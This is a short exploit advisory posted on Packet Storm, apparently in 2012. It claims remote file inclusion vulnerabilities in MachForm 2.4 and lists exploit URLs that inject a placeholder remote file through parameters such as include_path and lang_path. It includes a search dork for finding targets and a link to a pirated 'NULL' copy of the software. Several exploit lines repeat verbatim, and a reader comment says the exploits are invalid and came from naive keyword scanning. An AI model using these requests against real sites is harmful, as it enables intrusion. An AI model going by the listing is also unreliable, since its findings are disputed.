MachForm version 2.4 suffers from multiple remote file inclusion vulnerabilities.
b7a49f1630617a94570e00015b7b8553===============================
MachForm.v2.4 RFI Vulnerability
===============================
# Vendor: http://canopus.oron.com/i755lr7evek7np4dpndrvbqcqhs3uj4igorbmlhaqwglgek3qc2old7whll7z4mlrtcyk73t/MachForm.v2.4.PHP.NULL-DGT.zip
# Date: 2012-1-27
# Author : indoushka
########################################################
# Exploit By indoushka
-------------
dork : Powered by MachForm
Function: require File: embed_code.php Line: 2
Exploit: http://localhost/upload/embed_code.php?absolute_dir_path}=[EV!L]
##################################################
Function: require File: machform.php Line: 1
Exploit: http://localhost/upload/machform.php?include_path=[EV!L]
##################################################
Function: require File: machform.php Line: 1
Exploit: http://localhost/upload/machform.php?include_path=[EV!L]
##################################################
Function: require File: machform.php Line: 1
Exploit: http://localhost/upload/machform.php?include_path=[EV!L]
##################################################
Function: require File: machform.php Line: 1
Exploit: http://localhost/upload/machform.php?include_path=[EV!L]
##################################################
Function: require File: machform.php Line: 1
Exploit: http://localhost/upload/machform.php?include_path=[EV!L]
##################################################
Function: require File: machform.php Line: 1
Exploit: http://localhost/upload/machform.php?include_path=[EV!L]
##################################################
Function: require File: machform.php Line: 1
Exploit: http://localhost/upload/machform.php?include_path=[EV!L]
##################################################
Function: include File: class.phpmailer.php Line: 18
Exploit: http://localhost/upload/lib/class.phpmailer.php?lang_path=[EV!L]
##################################################
Function: include File: class.phpmailer.php Line: 18
Exploit: http://localhost/upload/lib/class.phpmailer.php?lang_type=[EV!L]
##################################################
Function: include File: class.phpmailer.php Line: 18
Exploit: http://localhost/upload/lib/class.phpmailer.php?lang_path=[EV!L]
##################################################
----------------------------------------------------------
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments (1)
This is invalid exploit. None of the remote file inclusion exploit are valid. I suppose the person who reported this simply scan the code for the keyword "lang_path", "include_path" etc and marked it as exploitable once it found those keywords.
2012-03-06 15:59:21 UTC | Permalink | Reply